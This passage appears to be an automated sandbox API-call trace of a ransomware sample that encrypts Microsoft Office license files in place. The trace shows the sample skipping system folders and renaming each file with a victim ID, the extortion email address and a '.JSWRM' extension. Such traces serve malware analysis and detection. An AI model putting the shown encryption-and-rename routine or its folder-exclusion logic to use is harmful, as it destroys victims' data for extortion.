dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.441] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0105.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.441] CloseHandle (hObject=0x45c) returned 1 [0105.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0105.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0105.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0105.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0105.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0105.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0105.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.441] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription2-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription2-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription2-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0105.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0105.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0105.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.442] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe64ab356, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe64ab356, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe669b26a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_Subscription3-pl.xrm-ms", cAlternateFileName="O33BFA~1.XRM")) returned 1 [0105.442] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-pl.xrm-ms", lpString2=".") returned 1 [0105.442] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-pl.xrm-ms", lpString2="..") returned 1 [0105.442] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-pl.xrm-ms", lpString2="...") returned 1 [0105.442] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-pl.xrm-ms", lpString2="windows") returned -1 [0105.442] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-pl.xrm-ms", lpString2="recovery") returned -1 [0105.442] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.442] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.442] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.442] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.442] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-pl.xrm-ms", lpString2="msocache") returned 1 [0105.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0105.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription3-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription3-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0105.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0105.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription3-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription3-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0105.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0105.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0105.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0105.443] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription3-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.443] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11195) returned 1 [0105.443] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0105.444] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0105.446] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.446] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0105.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.446] CloseHandle (hObject=0x45c) returned 1 [0105.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0105.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0105.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0105.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0105.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0105.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0105.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.446] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription3-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription3-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription3-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription3-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0105.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0105.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0105.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.450] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe637a07d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe637a07d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe648513f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6e65, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_Subscription3-ppd.xrm-ms", cAlternateFileName="O37461~1.XRM")) returned 1 [0105.450] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ppd.xrm-ms", lpString2=".") returned 1 [0105.450] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ppd.xrm-ms", lpString2="..") returned 1 [0105.450] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ppd.xrm-ms", lpString2="...") returned 1 [0105.450] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ppd.xrm-ms", lpString2="windows") returned -1 [0105.450] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.450] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.450] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.450] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.450] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.451] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0105.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription3-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription3-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0105.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0105.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription3-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription3-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0105.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0105.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0105.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0105.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription3-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.451] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=28261) returned 1 [0105.452] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6e60) returned 0x24c1d0 [0105.452] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6e60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x6e60, lpOverlapped=0x0) returned 1 [0105.455] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.455] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6e60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x6e60, lpOverlapped=0x0) returned 1 [0105.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.455] CloseHandle (hObject=0x45c) returned 1 [0105.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0105.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0105.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0105.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0105.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0105.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0105.455] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.455] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription3-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription3-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription3-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0105.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0105.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0105.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.456] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe64ab356, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe64ab356, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6569f23, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d7e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_Subscription3-ul-oob.xrm-ms", cAlternateFileName="O34BB6~1.XRM")) returned 1 [0105.456] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.456] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.456] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.456] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.456] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.457] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.457] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.457] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.457] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.457] lstrcmpiW (lpString1="O365ProPlusR_Subscription3-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0105.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription3-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0105.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription3-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0105.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0105.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0105.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription3-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0105.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription3-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d0a0, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0105.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0105.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0105.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0105.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 